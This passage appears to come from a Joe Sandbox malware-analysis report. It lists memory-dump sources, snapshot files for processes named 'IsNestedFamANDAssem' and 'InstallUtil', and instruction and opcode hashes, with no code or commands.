                                                                  • Instruction ID: bfc48700ce9b287092100f343c9c90dcfc9f709e886b01edf90f77aa971fdf27
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: 88E0C234908208EBD714DFA4D8406ACBBB6EB49304F20C2DACC4923344C6729E42CF80
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7@Z
                                                                  • API String ID: 0-2778914280
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7@Z
                                                                  • API String ID: 0-2778914280
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c8c4cc304b76216342fed66d497eeeffe80b880d87cc32f47d222b6ae71ca2a
                                                                  • Instruction ID: 70189b460ff851cedc9145ee28801a46952ef4df620fed5861b2e2c7720ee081
                                                                  • Opcode Fuzzy Hash: 6c8c4cc304b76216342fed66d497eeeffe80b880d87cc32f47d222b6ae71ca2a
                                                                  • Instruction Fuzzy Hash: 5D11F078D08208EFCB80EFAAD1447ADBBF1EB45300FB084AAC40CA7316D7345A95CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d82ef764cb77380f729f97e5647a32cc877dde516642935a6dcb839bf23e29c5
                                                                  • Instruction ID: c1fec736c93ee4ee608cb509705c2959f0fd7fa5f437163c6849eb050d6a6800
                                                                  • Opcode Fuzzy Hash: d82ef764cb77380f729f97e5647a32cc877dde516642935a6dcb839bf23e29c5
                                                                  • Instruction Fuzzy Hash: 5DF0792848E3C05FC71787B159B54D83F70DD0B02071A0ACACCDA8B4A3C10D682FE722
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d6287bd8ce004e3fe7b7af95612229040f933f49ede9f5d5fa90ca1234fda92
                                                                  • Instruction ID: ef472c0043a78e8093d1085737dba657c800ce4a5c98581318b8daf1324ac7dc
                                                                  • Opcode Fuzzy Hash: 1d6287bd8ce004e3fe7b7af95612229040f933f49ede9f5d5fa90ca1234fda92
                                                                  • Instruction Fuzzy Hash: C9E0BD1188D3C00FC323037818B94E57FB08D2305971E08CBC8C68B0A3D51A692BEB22
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46888bc195dbb7a3e89eb000190b0e1de960cc58fdf55d0ac2248eebc24aa276
                                                                  • Instruction ID: 032599f605389344782c3d96d0810f6ce83fe2e810a1c4673b78a71e991ceed0
                                                                  • Opcode Fuzzy Hash: 46888bc195dbb7a3e89eb000190b0e1de960cc58fdf55d0ac2248eebc24aa276
                                                                  • Instruction Fuzzy Hash: FEE01714A4D2D04FCB176BB510B41E93FB1DE4B220B8809CEC9C64B1A3C90D242B9725
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 867da9c6ff1867c672bf436f1d3c907caf63de381c401b30f413ad9ba892e3f2
                                                                  • Instruction ID: 933740fd2417b6b1046fb8ada7666e75455620101e63962a51a400946f2efe8a
                                                                  • Opcode Fuzzy Hash: 867da9c6ff1867c672bf436f1d3c907caf63de381c401b30f413ad9ba892e3f2
                                                                  • Instruction Fuzzy Hash: BDC01234A00004ABCB0A9B95E8005AEBAB2EF8C211F60445AE902A2260CE225C149F28
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: acf82a49790dfcafb89412a0ea71d38d52b99380f0eb015b4121c91d657dc243
                                                                  • Instruction ID: 2cf64cd75d9494a4031d83bcb668faebcf3c0e2a9fb2af34889bb613afd74ee4
                                                                  • Opcode Fuzzy Hash: acf82a49790dfcafb89412a0ea71d38d52b99380f0eb015b4121c91d657dc243
                                                                  • Instruction Fuzzy Hash: FBA01132880A08CB82082BA0B80C20CBB2CEA0CA02BC08820E00E800028B2228288A80
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78146d748de50f1bd42951304c7650e372cd6a3792914882f34607beae8ac996
                                                                  • Instruction ID: 34041a0799da0a2cdfe89739a513cfd48313892577cee59b14d2dd6293ab99f3
                                                                  • Opcode Fuzzy Hash: 78146d748de50f1bd42951304c7650e372cd6a3792914882f34607beae8ac996
                                                                  • Instruction Fuzzy Hash: 0790023148460C8B558427D5784D595B75C95845157858451A50D415025E69682085A5